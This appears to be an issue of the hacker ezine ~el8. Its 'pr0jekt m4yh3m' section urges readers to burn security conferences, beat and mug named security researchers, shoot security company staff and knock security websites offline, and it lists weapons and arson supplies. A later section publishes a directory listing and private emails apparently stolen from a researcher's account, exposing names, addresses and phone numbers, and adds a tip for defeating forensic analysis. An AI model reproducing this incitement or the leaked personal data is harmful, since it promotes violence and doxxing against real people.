Copy Link
Add to Bookmark
Report
el8.3
#!/bin/sh
################################################
## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ##
## ---------------------------------------- ##
## IF YOU ALTER ANY PART OF THIS EZINE YOU ##
## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ##
## ------------------------------------------ ##
## IF YOU ALTER ANY PART OF THIS EZINE YOU ##
## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ##
## ------------------------------------------ ##
## IF YOU ALTER ANY PART OF THIS EZINE YOU ##
## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ##
## ------------------------------------------ ##
## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ##
################################################
##::::::::::::::::::::::::::::::::::::::::::::##
##:'####::::::'########:'##::::::::'#######:::##
##'## ##:'##: ##.....:: ##:::::::'##.... ##::##
##..::. ####:: ##::::::: ##::::::: ##:::: ##::##
##:::::....::: ######::: ##:::::::: #######:::##
##:::::::::::: ##...:::: ##:::::::'##.... ##::##
##:::::::::::: ##::::::: ##::::::: ##:::: ##::##
##:::~el8[3]:: ########: ########:. #######:::##
##::::::::::::........::........:::.......::::##
################################################
## the definitive src for the Porno H/P Scene ##
################################################
## do "sh <ISSUE_NAME>" to extract eldump.c ##
## compile eldump.c and use it to extract ##
## the rest of the w4r3z: ##
## $ ./eldump el8.3.txt -vvv ##
## <*> whitehated.topcities.com ##
## <*> ftp.uu.net/tmp/EL8MAGAZINEDONTDELETE ##
## <*> keyword "~el8" on aol.com ##
## <*> www.textfiles.com/~el8 ##
## <*> nipc.gov/~el8 ##
## <*> www.fedworld.gov/0day/~el8 ##
## <*> www.fbi.gov/top10mostwanted/~el8 ##
## <*> www.securityfocus.com/weareowned.txt ##
## <*> www.incidents.org/~el8 ##
## <*> www.whitehats.com/weareowned.txt ##
## <*> www.blackhat.com/plzdonthurtus.txt ##
################################################
## where have all the 0dayz g0neeeeeeeeeeeee! ##
################################################
cat <<'-+-+'> /dev/null
[BOI]
[BEGIN_DIR] articles
.~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~.
|#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#|
|#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#::'####::::::'########:'##::::::::'#######::'##:'#######:'##:::#|
|#:'## ##:'##: ##.....:: ##:::::::'##.... ##: #::...... #:: #:::#|
|#:..::. ####:: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#|
|#::::::....::: ######::: ##:::::::: #######:: #::: ######:: #:::#|
|#::::::::::::: ##...:::: ##:::::::'##.... ##: #:::..... #:: #:::#|
|#::::::::::::: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#|
|#::::::::::::: ########: ########:. #######:: ##: #######: ##:::#|
|#:::::::::::::........::........:::.......:::..::.......::..::::#|
|#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#|
|#:::::::::::::::::FUCKN UP WHITEHATS SINCE 1998:::::::::::::::::#|
|#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#|
`~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~'
,-._,-._ .----------------------------------.
_,-\ o O_/; | OpenBSD! The proactively secure |
/ , ` `| | operating system! ... |
| \-.,___, / ` | FOR ME TO PISS ON! |
\ `-.__/ / ,.\ `----------------------------------'
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || ;
.-"-._,(__) .(__).-""-. `
/ \ / \ '
\ / \ / `
`'-------` `--------'` ;
11:46PM up 2 days, 6:25, 22 users, load averages: 0.47, 0.27, 0.20
USER TTY FROM LOGIN@ IDLE WHAT
deraadt C0 - Wed05PM 5:57 emacs -nw -u deraadt -f zenicb
mickey p0 versalo.lucifier Wed07PM 15 icb -n mickey -g hackers -s cvs
millert p1 millert-gw.cs.co 3:37PM 2:48 tail -fn-100 /cvs/CVSROOT/ChangeLog
deraadt p2 v.openbsd.org Thu11PM 1:06 -csh
form p3 vell.nsc.ru Thu11PM 21:29 less /cvs/CVSROOT/ChangeLog
pvalchev p4 dsl-dt-207-34-11 Thu05PM 15 tail -fn-50 /home/hack/pvalchev/chan
deraadt p5 zeus.theos.com Wed05PM 0 systat vm 1
deraadt p6 zeus.theos.com Wed05PM 2days tail -f /cvs/CVSROOT/ChangeLog
deraadt p7 zeus.theos.com Wed05PM 3 -csh
deraadt p8 zeus.theos.com Wed05PM 3 gv scanssh.ps
deraadt p9 zeus.theos.com Wed05PM 1:26 emacs -nw -u deraadt -f mh-rmail
deraadt pa zeus.theos.com Wed05PM 16 less machdep.c
deraadt pb zeus.theos.com Wed05PM 16 -csh
deraadt pc zeus.theos.com Wed05PM 5:57 -csh
angelos pd coredump.cs.colu Thu02PM 2:48 icb -g hackers -h localhost -n angel
deraadt pe zeus.theos.com Wed05PM 2:29 -csh
provos pf ssh-mapper.citi. Wed05PM 27:21 tail -f I_AM_A_LUSER_AND_A_MORON
brad q0 speedy.comstyle. Wed06PM 28:27 tail -f /cvs/CVSROOT/ChangeLog
aaron q1 nic-131-c68-101. 8:43AM 15 icb -scvs -ghackers
lebel q2 modemcable093.15 Thu09PM 2:48 -bash
wvdputte q3 reptile.rug.ac.b 5:45AM 12:56 tail -f 2001-09
jason q4 24-168-200-128.w Thu08AM 1day -ksh
deraadt q5 hackphreak.org 4:20AM 0 w
~el8 is dope. kool-rad k-fat badassezinenodoubt
~el8 is dope. kool-fresh k-hip shit shit
~el8 is dope. k-hip k-kul elite elite
~el8 is dope. bad ass badaz eliteasshitaselite
~el8 is dope. k-hip fuck!. elite elite
~el8 is dope. kool-fresh ~el8!roxroxrox shit shit
~el8 is dope. kool-rad koolhipawesome badassezinenodoubt
.----------------------------------------------------------------.
; t4ble of h0ly w4r3z & bey0nd ; ;
`------------------------------' ;
; *00* ~e~ intr0duktion ;
; *01* ~e~ pr0jekt m4yh3m ;
; *02* ~e~ Know Your WhiteHat Enemy ;
; *03* ~e~ zeroday screen exploit ;
; *04* ~e~ lyfestylez of the owned and lamest with pm ;
; *05* ~e~ muz1k in the undergr0und ;
; *06* ~e~ defacements of the milenium ;
; *07* ~e~ ~el8 hitlist tools ;
; *08* ~e~ bronc buster busted ;
; *09* ~e~ lcamtuff helps ~el8 ;
; *10* ~e~ lyfestylez of the owned and lamest with jobe ;
; *11* ~e~ phrack staff demystified ;
; *12* ~e~ gobble blaster ;
; *13* ~e~ 1nterv1ew with te4m OG ;
; *14* ~e~ lyfestylez of the owned and lamest with aempirei ;
; *15* ~e~ chapter sixteen ;
; *16* ~e~ ELDUMP & ELTAG ~el8 ez1ne t00lz ;
`----------------------------------------------------------------'
.----------------------------------------------------------------.
; t4ble of ~el8 m3mbrZ ; ;
`----------------------' ;
; SiLLY G00S3 -> THe HiGH PReeZT ;
; FuNNY BuNNY -> a BLiP oN YOuR GaYDaR ;
; ODaY MaZTeR -> GeTZ aLL THe HoEZ and CoDEz ;
; ENRiCO -> INSaNe IN ThE MeMBRAiN ;
; ReDPUBeZ -> AkA KARRoT_BoTToM ;
; CaWCaW -> EYe'LL TEaR YoUR EyEZ OuT ;
; KRaD -> sO FReSH & sO CLEaN ;
; PoOtIeTaNG -> CRaZY CooL FRe$h ;
; UNCLe MaViS -> HaS YOu IN A HEaDLoK ;
; TcJ -> ThE CRiMiNaL JESuS ;
; CLiFF SToLE -> CLiFF SToLE YOUR CoDEz ;
; JaMeS BRoWN PaNTZ -> STAiNeD UNDeRWaREZ ;
; JoHNY SiX ToEZ -> MuTaTED MiKE ;
; DiNOSaUR MaN -> THe OLD SCHooL ;
; MiKE TySoN -> THe DaHMeR oF BoXiNG ;
; BaLLSaCK -> Mr HuGE NuTZ ;
; ARaB BiLL -> MeKKa DoN WoN ;
; KaRELeSS KaRL -> EyE DoNT WiPE LoGZ ;
; OSaMA BiN LaDEN -> GeORgE BuSH ;
; ThE UNiX TeRRoRiZt -> RM'z YoUR BoX WiTHOuT ReMORsE ;
; PuSSy FaCEd KiLLa -> GHoST FaCE KiLLaZ HoMEsLiCE ;
; CHiNeeZ TiMMy -> CReAM oF SuM YuN GaI ;
; SeXPaTRiOT -> THe PoRNo HaCKeR ;
; T z D -> TEaM ZeRODaY ;
`----------------------------------------------------------------'
.~e~----------------------------------------------------------~e~.
; *00* intr0duktion -- ~el8 TEaM ;
`----------------------------------------------------------------'
~el8 c0uld f1ll this ez1ne with s0 much shyt but we'd lyke
to release 0ver 150 issuez, s0 st4y tun3d. n0 intr0 n33ded.
we r the h4rdkore h4krz who clean your toilets, the h4rdkore k0derz
who forcefully w1pe y0ur wind0wz @ st0pl1ghtz and intersekti0nz,
the h4rdk0re phre4krZ who mow your l4wn, the h4rdk0re cr4krz
who ste4l cl0thez from the salvati0n army, we take yor orderz
at burger k1ng, we steal yor hubk4pz, we even put k4meraz in
port `o pottiez. *_DO_* *_NOT_* *_FUCK_* *_WITH_* *_US_*.
~el8
.~e~----------------------------------------------------------~e~.
; *01* pr0jekt m4yh3m -- ~el8 ;
`----------------------------------------------------------------'
w1th such h1gh figurez in the sekurity scene being 0wn3d and humili4ted,
eye h4ve t0 s4y that pr0jekt m4yhem has been a succ3ss. ~el8 kn0wz of
at le4st 153 DEDICATED FOLLOWERZ to the cause. th3r3 is of course, many
others who believe. pr0j3kt M4yh3m cellz oper8 ind3p3ndent of each 0ther.
w3 have in fact cre4t3d an army. w3 w1ll n0w n4me a very sm4ll porti0n of
pr0j3kt m4yh3m'z victims (th3r3 ar3 0th3rz muwhaah4hahah): k2, dugsong,
lance spitcock, horizon, Chris Spencer, provos, Toby Miller, Al Hugher,
ISS, NAI, QUALYS, EEYE, deraadt, route, @stake, Brian McWilliams, spaf,
zip, TESO, ADM, w00w00, HERT, BVIEW, 0k th1s l1st c4n g0 0n and 0n but w3
d0nt w4nt t0 w4ste it all in 0ne ez1ne. whY be t4rg3t3d by us wh3n y0u
can j0in us. why p0st info, codes, or bugs wh3n the end result iz y0ur
ent1re syst3m, f4mily, and friends being 0wn3d t0 mega-fuck. d0eznt it l00k
like more phun to be a bl4ckhat than a wh1tehat (th3r3 iz no inbetween).
w1th that being said, pr0j3kt mayh3m has been br0ught t0 a n3w l3vel.
n0 l0nger do we w4nt YOU OUR LOYAL FOLLOWERS to simplY 0wn s3kurity
fucks wh0 st3p 0n 0ur turph. w3 w4nt y0u t0 cause w0rldw1de physical
destructi0n to the sekurity industry infrastructure. but plz c0ntinue
t0 d0 a g00d j0b 0n the internet p0rti0n of projekt m4yhem.
h3re is h0w this can be accomplished:
------------------------------------'
* g0ing t0 defk0n or blackhat? initiat3 a n4palm stryke.
BURN THE M0THERFUCK3R D0WN. bre4k s0me computers. beat
the fuck 0ut 0f the whitehat puss1ez wh0 attend or g1ve
spe3chez. th1s can be done very easily with the us3 of
gas0line and or baseball bats. th1s meth0d applies at
all security/"h4ker" cons.
* loc8d near a security company? sh00t ISS employeez with a
paintball gun (y0u c4n us3 h1gh p0wer3d r1fl3z but iph
y0u g3t caught ur in f0r lyfe, s0 use p4intball gunz f0r
wh3n you are released you c4n c0ntinue y0ur missions). th1s
meth0d appliez t0 all sekurity companies loc8d near y0u.
h0wever, iph y0u w1sh t0 m4ke your MECCA pilgramag3 to ISS
HQ in ATLANTA, th3n thats f1ne by us.
* loc8d near a whitehat security d00d? g1ve em` a g00d mugging.
thre4ten them that if they c0ntinue in th1s m4nner, y0u w1ll
s1lence th3m f0rever. th1s meth0d w0rk3d in f0rc1ng hugh3r
d0wn fr0m his p0sition as bugtraq m0derat0r. th1s meth0d also
appliez f0r peo0ple wh0 wr1te f0r phr4ck and the like.
* sp3cial m3th0d, see a pers0n wear1ng s0me sort of "r00t" clothing,
be4t the fuck 0ut 0f them.
* special meth0d for missi0n #1 th4t st1ll n33dz t0 be accomplish3d:
DoS'n of maj0r sekurity websites. l3tz t4ke 0ut securityfocus,
neohapsis, google, incidents, packetstorm, and the lyke. f0ll0werz
of ~el8 muzt d0wn th3se s1tez 4ever. w3 w1ll shut them d0wn, and th3y
w1ll b0w t0 us. 0ther s1tez w0rth d0wning: freshmeat, slashdot,
hackphreak, blackhat, defcon, cnn, infonexus, packetfactory...
~el8's pr0jekt m4yhem sw1ss armY kn1fe:
--------------------------------------'
* w1re kutterz / metal kutters
* HERF gun
* spr4y p4int
* l1ghter fluid (or diesel fuel)
* p4ck of matchez
* one bick lighter
* some s0rt of face mask (one roll of panty hose)
* a backpack
* handkuff keys in the heel of your sne4kerz
* one smoke bomb and or hand grenade
* one rambo knife
* one hidden thumb tack
* one digital camera to record recruiting material
for the el8:
-----------'
* one taser / stun gun
* one bazooka
* one ak-47 or m-16
* one police scanner
* a pack of big chew bubble gum
* and one flame thrower
m1ssi0n 0n3 of pr0jekt m4yhem has b33n acc0mplizhed, and must c0ntinue
in itz 0n g0ing eff0rt t0 0wn the sekurity / whitehat scene. m1ssi0n tw0
is actu4lly easi3r t0 acc0mpl1sh, s0 l3tz g3t th1s 0ne r0ll1ng. th3 w4r
h4z been decl4red, the w4r has been initiated, th3 w4r iz being w0n.
-- ~el8 tEaM
.~e~----------------------------------------------------------~e~.
; *02* Know Your WhiteHat Enemy -- odaymaztr ;
`----------------------------------------------------------------'
Know Your WhiteHat Enemy - odaymaztr
------------------------------------
many of you may have heard of this great new project called 'the honeynet
project', aimed at getting a firsthand look at the blackhat hacker mindset
and to share the lessons learned. at first glance, you blackhats may think
'oh n0!@# im screwed !@# these whitehats with their 'modified to log' sh
binarys are getting so so tricky!@#'. at first it may have seemed a little
threatening, but after looking over their whitepapers, apprehension
quickly turned to laughter. we were also a little confused when we noticed
that evil ADM guys such as 'K2' were part of this whitehat organization.
so we decide to investigate ...
$ id
uid=100(ktwo) gid=100(users) groups=100(users)
$ pwd
/export/home/ktwo
$ ls -al
drwxr-x--x 16 ktwo users 4096 .
drwxr-xr-x 8 root root 4096 ..
drwx------ 3 ktwo users 4096 .BitchX
-rw-r--r-- 1 ktwo users 0 .addressbook
-rw------- 1 ktwo users 2285 .addressbook.lu
-rw-r--r-- 1 ktwo users 1289 .admirc
-rw------- 1 ktwo users 5194 .bash_history
-rw-r--r-- 1 ktwo users 82 .bashrc
drwx------ 2 ktwo users 4096 .gnupg
-rw-r--r-- 1 ktwo users 34 .less
-rw-r--r-- 1 ktwo users 114 .lessrc
drwxr-xr-x 2 ktwo users 4096 .ncftp
-rw------- 1 ktwo users 14498 .pinerc
lrwxrwxrwx 1 ktwo users 7 .profile -> .bashrc
-rw-r--r-- 1 ktwo users 5 .qmail-default
drwx------ 2 ktwo users 4096 .screen
-rw-r--r-- 1 ktwo users 3394 .screenrc
drwx------ 2 ktwo users 4096 .ssh
drwxr-xr-x 3 ktwo users 4096 .ssh2
-rw-r--r-- 1 ktwo users 257118 02-03-06 CORE_IMPACT.pdf
-rw-r--r-- 1 ktwo users 211975 194_HPYN2E_te_16.ZIP
-rw-r--r-- 1 ktwo users 3281174 194_HPYN2E_te_16.doc
-rw-r--r-- 1 ktwo users 71145 admirc-0103090536.tgz
drwxr-xr-x 10 ktwo users 4096 admirc1
-rw-r--r-- 1 ktwo users 12091 apache-iss.tgz.pgp
-rw-r--r-- 1 ktwo users 3830 attn.tar.gz
-rw-r--r-- 1 ktwo users 7782 authorbio_instructions.zip
-rw-r--r-- 1 ktwo users 1827 beto.asc
drwxr-xr-x 2 ktwo users 4096 bin
-rw-r--r-- 1 ktwo users 32840 caddis-dtspcd.c
-rw-r--r-- 1 ktwo users 9810 caddis-radius.c
-rw-r--r-- 1 ktwo users 1384 caddis.key
-rw------- 1 ktwo users 264 dead.letter
drwxr-xr-x 6 ktwo users 4096 dl
-rw-r--r-- 1 ktwo users 69408 dtscp.tgz
drwxr-x--- 3 ktwo users 4096 dtspc
-rw-r--r-- 1 ktwo users 27150 dtspcd-8.6.tgz
-rw-r--r-- 1 ktwo users 4833 exploit.html
-rw-r--r-- 1 ktwo users 3008 gpg-pubkey.asc
drwxr-xr-x 2 ktwo users 4096 ida
-rw-r--r-- 1 ktwo users 4535 ihack.c
-rw-r--r-- 1 ktwo users 7710 infect.tar.gz
-rw-r--r-- 1 ktwo users 47765 irc.txt
-rw-r--r-- 1 ktwo users 2268 job
-rw-r--r-- 1 ktwo root 188416 list.mdb
drwx------ 2 ktwo users 4096 mail
-rw------- 1 ktwo users 35331378 mbox
-rw-r--r-- 1 ktwo users 912 msg
-rw-r--r-- 1 ktwo users 1642 msg.asc
-rw-r--r-- 1 ktwo users 3008 new-pub.asc
-rw-r--r-- 1 ktwo users 1720 noir
-rw-r--r-- 1 ktwo users 1634 pubkey.pgp
-rw-r--r-- 1 ktwo users 3824 solar-atach
-rw-r--r-- 1 ktwo users 2064 solar-msg
-rw-r--r-- 1 ktwo users 12 solar-msg.asc
-rw-r--r-- 1 ktwo users 177 suid
-rw-r--r-- 1 ktwo users 43 super
drwxr-xr-x 3 ktwo users 4096 tmp
-rw-r--r-- 1 ktwo users 19668 ttdb.c
after exploring all his shells (zolo rulez dewD!!#), the ~el8 investigative
unit decided to search his email for clues...
(J4n3 and D1ck used in some cases to protect the innocent!)
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: Lance Spitzner <lance@honeynet.org>
To: K2 <ktwo@ktwo.ca>
Subject: Re: dtspcd exploit obtained (fwd)
Your buddy interested in chatting with the MITRE folks?
Alot of people are very impresses with his exploit :)
--
Lance Spitzner
http://project.honeynet.org
---------- Forwarded message ----------
From: J4ne <J4ne@mitre.org>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit obtained
I went to the apparent authors website. It hardly mentions an interest in secur
ity,
but it does look like he used to teach at the University of Central Michigan
http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with thi
s
person at all?
I'm wondering if he didn't write this code to teach someone else and then that p
erson
started distributing it. This guy looks like he knows his stuff and not strippi
ng the
symbols doesn't seem to fit with that.
J4n3
Lance Spitzner wrote:
> J4n3 wrote:
>
> > It was very nice of the author to include his name and email :). I was look
ing
> > at the strings output and it looks like the author took a lot of time to do
error
> > checking and write one of the better usage statements i've seen. I also did
n't
> > notice a single misspelling and no script kiddish text at first glance. To
me
> > that says a few things about the author. Is this typical of what you see in
> > exploit code? Most of the stuff i've seen in public postings is nowhere nea
r
> > this clean.
>
> Its extremely well written, and powerful. Definitely not our
> typical exploit :)
>
> lance
note: mitre has elite modified strings binary to see if author has done proper
error checking (very kewl!!!)
note: use strip on binarys to confuze forensic analysis!!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: Lance Spitzner <lance@honeynet.org>
To: K2 <ktwo@ktwo.ca>
Subject: Re: dtspcd exploit obtained (fwd)
K2 wrote:
> I'll ask him
Dude, this is not a big deal. Just a lot of
people interested in his exploit code, its more
impressive then most. NSA and FBI even asked
me for a copy. :)
lance
note: kn0ck kn0ck eff-bee-eye stiq em up script kid!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: Lance Spitzner <lance@honeynet.org>
To: D1ck Song <D1ck@monkey.org>, "'D1ck Ruiu'" <dr@kyx.net>,
K2 <ktwo@ktwo.ca>, J4ne Roesch <J4ne@sourcefire.com>
Subject: For Project, OBSD on Sun or Intel?
Gents,
Seeing as how you are respected OpenBSD guru's, AND
members of the Project, wanted to throw this question
at you.
Looks like we might get an OC12 and hardware donated
to the Project, specifically for our internal and external
webserver and project Infrastructure. We will be standardizing
on OpenBSD.
Since we have our choice of software, is there any security
value add installing OpenBSD on Sparc, or is Intel fine?
My line of thinking is the non-Intel architecture would help
defeat some exploit code. Or am I just wasting time and
making life harder with OpenBSD on Sparc?
Thanks!
--
Lance Spitzner
http://project.honeynet.org
note: yeah ur wastin ur time bro, we'd own u even if u installed netbsd on ur xbox.
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: "D1ck H. Rowland" <D1ck@psionic.com>
To: "J4ne Hines" <J4ne@pitt.edu>, <honeypots@securityfocus.com>
Subject: RE: DTSPCD Exploit
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>=20
> Hey all, I've had several Solaris honeypots compromised where 2 files
> (kcsun and antisun) binaries were uploaded, used and than deleted.
> Does anyone by any chance (Lance?) know if these are the filenames
> for the highly searched for DTSPCD exploit? If not, has anyone whose
> honeypots been compromised seen these files downloaded to their box
> for use before?
>=20
> Can't pull up anything on these filenames at Google. Please advise.
On a similar note, has anyone tried putting append-only flags on the =
target directories to keep the people from removing these files? I'm =
looking for anyone with experience in using append-only *directories* on =
honeypots (not just append-only logs). There does not appear to be any =
references talking about using this technique from what I've seen.
Yeah I already know the arguments: "Immutable flags can be bypassed by a =
knowledgeable attacker..." I suppose the real question is how many =
people are going to stick around once they found out they're effectively =
hacking a system with a WORM drive (I suspect not many). Additionally, I =
would like to tie a measure like this to some type of system timer =
(external or otherwise) that will shut down the connection after X =
minutes have elapsed of intruder activity. This could help catch them in =
midway through the panicking process and could lead to some interesting =
results.=20
Thanks,
-- D1ck
note: i thought rm'd binarys were not a problem for u forensic experts!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: D1ck Eckholt <D1ck@crank.de>
Subject: Re: ADMmutate
Hey, I am not @ honme for another week, but if you want too look into it I
supply a paper and some demonstration exploits and vulnerabilities in
http://www.ktwo.ca/c/ADMmutate-0.8.4.tar.gz I do my testing against snort
or RealSecure works good :)
Later,
K2
D1ck Eckholt wrote:
> hello to canada ;-)
>
> first at all, sorry for my bad english, but i'll try my very best.
> i am a german student and i want to make an short presentation
> about your "ADMmutate" tool. i need a little support for doing
> that and so i hope, you can help me:
>
> 1.) which software (network IDS) is the best for a simple test ?
> my unix/linux skills are not the best, so i would prefer a IDS
> (maybe an older one) for windows NT.
> 2.) do you have or know a sourcecode of a simple buffer-overflow
> exploit, which can be used with your tool in a presentation ?
> 3.) do you know good links where a can go deeper into this topic ?
>
> so i hope, you have time to help me with my stupid questions, but
> i am very interested in this work and i am standing just at the beginning...
>
> thanks and greetings from germany
>
> D1ck eckholt
>
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: J4ne Oon <J4ne@bee-net.com>
cc: 'D1ck Ruiu' <D1ck@kyx.net>
Subject: Re: Security Consulting Opportunity
James: Lance had copied Dragos and myself on this message. We are based
in Vancouver, BC Canada and have quite a bit of experience doing network
penetration assessments. Dragos has over a decade in the network security
field and has been closely tied with the IDS community for some time as
well. We are both currently members of the Honeynet Project and have
developed our skills over a long period of detailed technical study and
review. As both of us are out of town until December 10 working on other
client engagements, could you give us a bit more detailed explanation of
the size and scope of the assessments and reviews you would like
conducted. Information as too weather or not you would need a local
presence and the estimated duration of this project.
Thank you.
K2
Lance Spitzner wrote:
> James Oon wrote:
>
> James, I'm afraid I'm unable to commit to this, however I
> have copied to experts in this field, they may be able to
> help you out.
>
> Thanks!
>
> > G'day Lance,
> >
> > My name is James Oon, and I was with Sun Microsystems Professional
> > Services
> > based in Singapore from 1995 to 2000. I have left since for a
> > consulting company
> > called BEENET.
> >
> > Anyway, the purpose of the email is to to enquire regarding your
> > interest to do a
> > security audit for stock exchange. The job is to perform a
> > penetration test and
> > security review. Problem is that some of the machine is on S/390
> > (especially the
> > backend). We are willing to pay a handsome sum for the job.
> >
> > Please email me back if you are interested or if you know someone
> > else who is
> > interested.
> >
> > Many thanks.
> >
> > Regards
> > James Oon
> >
>
> --
> Lance Spitzner
> http://project.honeynet.org
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: D1ck f4ce <silvio@qualys.com>
Subject: Re: virus (err.. cansecwest)
Elite!!! I spoke with dragos and he thinks it'd be an awesome addtion too
the conf. Sure man, just prep a powerpoint show for the conf or something
or however you wanna give a talk. Give dragos a showt (dr@kyx.net) or msg
him on IRC, i finally got his ass to show up pretty consistantly in
#!w00w00 (usually nik dr or something) I think he's mesg'ng you now but I
think it's late over there... Let me know how it all goes, I thnk it'd be
fun to finally get together ;)
We'll be partieng hardcorein Vancouver man :)
K2
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Catherine Nolan <catherine@syngress.com>
Subject: Re: Hack Proofing Your Network, Second Edition
Hi Catherine: Sounds like an interesting proposition, could you send me
the outline and the list of open chapters in case anything else sparks my
interest? Also would it be possiable to see a copy of the first edition
so I could get an idea of the writing style of the rest of the book. I'm
out of town until Monday so please forgive the poor spelling in this email
(no access too a good email client when I am remote).
Thanks and I look forward to hearing from you,
K2
Catherine Nolan wrote:
> Hello K2 -
>
> Please allow me to introduce myself as the acquisitions editor for Syngress
> Publishing, my name is Catherine Nolan.
>
> Your name was forwarded to me by Ryan Russell as a potential author for the
> second edition of his book Hack Proofing Your Network: Internet Tradecraft.
> In particular Ryan has recommended you for the chapter on IDS Evasion.
>
> You would be joining the esteemed authoring team already in place consisting
> of Kingpin, RSnake, Rain Forest Puppy, Dan Kaminsky, Ryan Permeah, Hal
> Flynn, Marc Maiffret (?), and of course Ryan Russell.
>
> I have an outline available for the topics to be covered in this chapter, if
> you are interested in reviewing it please contact me at your earliest
> convenience. Also, this chapter is available in the first editon.
>
> If this topic is not of interest, but you are interested in contributing let
> me know and I'll forward you a list of the other open chapters.
>
> We are currently offering $18/ per manuscript page as compensation for this
> chapter. We would expect that the new chapter could be delivered in one
> month's time.
>
> I look forward to hearing from you regarding this matter.
>
> Thank you in advance for your cooperation,
> Catherine
> Catherine B. Nolan
> Acquisitions Editor
> catherine@syngress.com
> 781-681-5151 ext 18
>
> Syngress Publishing
> 800 Hingham Street
> Rockland, MA 02370
> http://www.syngress.com
note: ~el8 will sabotage Hack Proofing Your Network II
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Ryan "D1ck sucking" Russell <ryan@securityfocus.com>
Subject: Re: book...
CHP 16 IDS Evasion
Ryan Russell wrote:
> Excellent. Just to confirm, which chapter do they have you working on?
>
> Ryan
>
> K2 wrote:
>
> > Hey Ryan, how's it goin? Thanks for the opertunity in working on your
> > book, it seems like a pretty cool group. I'm spending some time working
> > out my draft for next week. I'll probably demo against snort and
> > RealSecure. Hope it's all going well.
> >
> > Thanks,
> > K2
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: <ryan@securityfocus.com>
Subject: Hailstorm
Ryan, I Know you said to use Hailstorm as an example of some packey level
evasions, but I believe clicktosecure.com is down and I cannot find much
literature about this product. Do you have anything that I could look at?
I am going to go on about dugsongs fragrouter and horizons Defeating
Sniffers and Intrusion Detection Systems phrack paper that included
congestant.c
note: k2, the click and point specialist
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: "Jennifer 8. Lee" <jenny@nytimes.com>
Subject: RE: APCO?
Just some work with the honeynet, developing some code and tools for use
in a few applications. Real life work is pretty demanding right now,
allthough I am trying to find openings in the US. I want to be closer to
some family.
TTYL,
K2
Jennifer 8. Lee wrote:
>
> okay. how are you doing? are you working on something interesting?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: J4ne Nolan <catherine@syngress.com>
Subject: RE: Chapter
Here you go...
Hope there arent too many bugs, visio died on me so I had to dump one of
the diaagrams.
K2
Catherine Nolan wrote:
> Sure....I'm usually okay with extending dates a day or so. I'll look
> forward to reviewing your chapter first thing tomorrow morning.
>
> C
>
> Catherine B. Nolan
> Acquisitions Editor
> catherine@syngress.com
> 781-681-5151 ext 18
>
> Syngress Publishing
> 800 Hingham Street
> Rockland, MA 02370
> http://www.syngress.com
>
> -----Original Message-----
> From: K2 [mailto:ktwo@ktwo.ca]
> To: Catherine Nolan
> Subject: Re: Chapter Delivery Reminder
>
> Catherine, can you actually give me until the end of day Monday (eg.
> 8pm) I am going to be travelling all day and will not have net acess
> until then.
>
> Thanks,
> K2
>
> Catherine Nolan wrote:
>
> > Hi Guys -
> > I'd like to remind you all that your completed first drafts of your
> chapters
> > will be due this coming Monday. I would prefer that they be submitted to
> me
> > during working hours. I can't tell you how many people think Monday means
> > Tuesday....because they submit their work at 11:20 PM.
> >
> > I hope that this will help you plan your weekends accordingly.
> >
> > Thank you all for your hard work thus far - keep it up!
> >
> > Best,
> > Catherine
> > Catherine B. Nolan
> > Acquisitions Editor
> > catherine@syngress.com
> > 781-681-5151 ext 18
> >
> > Syngress Publishing
> > 800 Hingham Street
> > Rockland, MA 02370
> > http://www.syngress.com
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
